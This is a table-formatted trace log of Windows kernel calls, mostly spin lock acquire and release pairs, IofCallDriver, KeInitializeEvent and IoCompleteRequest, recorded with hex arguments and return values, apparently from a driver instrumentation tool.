| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a769d84, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a769d84 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| IoCompleteRequest | ret_val_out = 0x0 |
| KeInitializeEvent | Type_unk = 0x0, State = 0, Event_unk_out = 0xffffd0002d5eceb0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55af20 |
| IofCallDriver | DeviceObject_unk = 0xffffe0004c9e7d00, Irp_unk = 0xffffe0003c839cf0, Irp_unk_out = 0xffffe0003c839cf0, ret_val_out = 0x103 |
| KeInitializeEvent | Type_unk = 0x0, State = 0, Event_unk_out = 0xffffd0002d5ece20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| IofCallDriver | DeviceObject_unk = 0xffffe0004c9e7d00, Irp_unk = 0xffffe0003c839cf0, Irp_unk_out = 0xffffe0003c839cf0, ret_val_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a76efe4, SpinLock_unk_out = 0xffffe0003a76efe4, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a76efe4, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a76efe4 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a76efe4, SpinLock_unk_out = 0xffffe0003a76efe4, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a76efe4, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a76efe4 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a76efe4, SpinLock_unk_out = 0xffffe0003a76efe4, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a76efe4, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a76efe4 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a76efe4, SpinLock_unk_out = 0xffffe0003a76efe4, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a76efe4, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a76efe4 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a76efe4, SpinLock_unk_out = 0xffffe0003a76efe4, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a76efe4, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a76efe4 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| IoCompleteRequest | ret_val_out = 0x0 |
| KeInitializeEvent | Type_unk = 0x0, State = 0, Event_unk_out = 0xffffd0002d5eceb0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55af20 |
| IofCallDriver | DeviceObject_unk = 0xffffe0004c9e7d00, Irp_unk = 0xffffe0003c839cf0, Irp_unk_out = 0xffffe0003c839cf0, ret_val_out = 0x103 |
| KeInitializeEvent | Type_unk = 0x0, State = 0, Event_unk_out = 0xffffd0002d5ece20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| IofCallDriver | DeviceObject_unk = 0xffffe0004c9e7d00, Irp_unk = 0xffffe0003c839cf0, Irp_unk_out = 0xffffe0003c839cf0, ret_val_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a76ffe4, SpinLock_unk_out = 0xffffe0003a76ffe4, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a76ffe4, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a76ffe4 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a76ffe4, SpinLock_unk_out = 0xffffe0003a76ffe4, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a76ffe4, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a76ffe4 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a76ffe4, SpinLock_unk_out = 0xffffe0003a76ffe4, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a76ffe4, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a76ffe4 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a76ffe4, SpinLock_unk_out = 0xffffe0003a76ffe4, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a76ffe4, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a76ffe4 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a76ffe4, SpinLock_unk_out = 0xffffe0003a76ffe4, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a76ffe4, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a76ffe4 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| IoCompleteRequest | ret_val_out = 0x0 |
| KeInitializeEvent | Type_unk = 0x0, State = 0, Event_unk_out = 0xffffd0002d5eceb0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55af20 |
| IofCallDriver | DeviceObject_unk = 0xffffe0004c9e7d00, Irp_unk = 0xffffe0003c839cf0, Irp_unk_out = 0xffffe0003c839cf0, ret_val_out = 0x103 |
| KeInitializeEvent | Type_unk = 0x0, State = 0, Event_unk_out = 0xffffd0002d5ece20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| IofCallDriver | DeviceObject_unk = 0xffffe0004c9e7d00, Irp_unk = 0xffffe0003c839cf0, Irp_unk_out = 0xffffe0003c839cf0, ret_val_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a766b64, SpinLock_unk_out = 0xffffe0003a766b64, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a766b64, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a766b64 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a766b64, SpinLock_unk_out = 0xffffe0003a766b64, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a766b64, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a766b64 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a766b64, SpinLock_unk_out = 0xffffe0003a766b64, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a766b64, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a766b64 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a766b64, SpinLock_unk_out = 0xffffe0003a766b64, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a766b64, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a766b64 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a766b64, SpinLock_unk_out = 0xffffe0003a766b64, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a766b64, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a766b64 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| IoCompleteRequest | ret_val_out = 0x0 |
| KeInitializeEvent | Type_unk = 0x0, State = 0, Event_unk_out = 0xffffd0002d5eceb0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55af20 |
| IofCallDriver | DeviceObject_unk = 0xffffe0004c9e7d00, Irp_unk = 0xffffe0003c839cf0, Irp_unk_out = 0xffffe0003c839cf0, ret_val_out = 0x103 |
| KeInitializeEvent | Type_unk = 0x0, State = 0, Event_unk_out = 0xffffd0002d5ece20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| IofCallDriver | DeviceObject_unk = 0xffffe0004c9e7d00, Irp_unk = 0xffffe0003c839cf0, Irp_unk_out = 0xffffe0003c839cf0, ret_val_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a786b64, SpinLock_unk_out = 0xffffe0003a786b64, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a786b64, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a786b64 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a786b64, SpinLock_unk_out = 0xffffe0003a786b64, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a786b64, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a786b64 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a786b64, SpinLock_unk_out = 0xffffe0003a786b64, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a786b64, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a786b64 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a786b64, SpinLock_unk_out = 0xffffe0003a786b64, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a786b64, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a786b64 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a786b64, SpinLock_unk_out = 0xffffe0003a786b64, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a786b64, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a786b64 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| IoCompleteRequest | ret_val_out = 0x0 |
| KeInitializeEvent | Type_unk = 0x0, State = 0, Event_unk_out = 0xffffd0002d5eceb0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55af20 |
| IofCallDriver | DeviceObject_unk = 0xffffe0004c9e7d00, Irp_unk = 0xffffe0003c839cf0, Irp_unk_out = 0xffffe0003c839cf0, ret_val_out = 0x103 |
| KeInitializeEvent | Type_unk = 0x0, State = 0, Event_unk_out = 0xffffd0002d5ece20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| IofCallDriver | DeviceObject_unk = 0xffffe0004c9e7d00, Irp_unk = 0xffffe0003c839cf0, Irp_unk_out = 0xffffe0003c839cf0, ret_val_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003c634fe4, SpinLock_unk_out = 0xffffe0003c634fe4, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003c634fe4, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003c634fe4 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003c634fe4, SpinLock_unk_out = 0xffffe0003c634fe4, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003c634fe4, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003c634fe4 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003c634fe4, SpinLock_unk_out = 0xffffe0003c634fe4, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003c634fe4, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003c634fe4 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003c634fe4, SpinLock_unk_out = 0xffffe0003c634fe4, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003c634fe4, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003c634fe4 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003c634fe4, SpinLock_unk_out = 0xffffe0003c634fe4, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003c634fe4, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003c634fe4 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| IoCompleteRequest | ret_val_out = 0x0 |
| KeInitializeEvent | Type_unk = 0x0, State = 0, Event_unk_out = 0xffffd0002d5eceb0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55af20 |
| IofCallDriver | DeviceObject_unk = 0xffffe0004c9e7d00, Irp_unk = 0xffffe0003c839cf0, Irp_unk_out = 0xffffe0003c839cf0, ret_val_out = 0x103 |
| KeInitializeEvent | Type_unk = 0x0, State = 0, Event_unk_out = 0xffffd0002d5ece20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| IofCallDriver | DeviceObject_unk = 0xffffe0004c9e7d00, Irp_unk = 0xffffe0003c839cf0, Irp_unk_out = 0xffffe0003c839cf0, ret_val_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a786fe4, SpinLock_unk_out = 0xffffe0003a786fe4, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a786fe4, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a786fe4 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a786fe4, SpinLock_unk_out = 0xffffe0003a786fe4, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a786fe4, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a786fe4 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
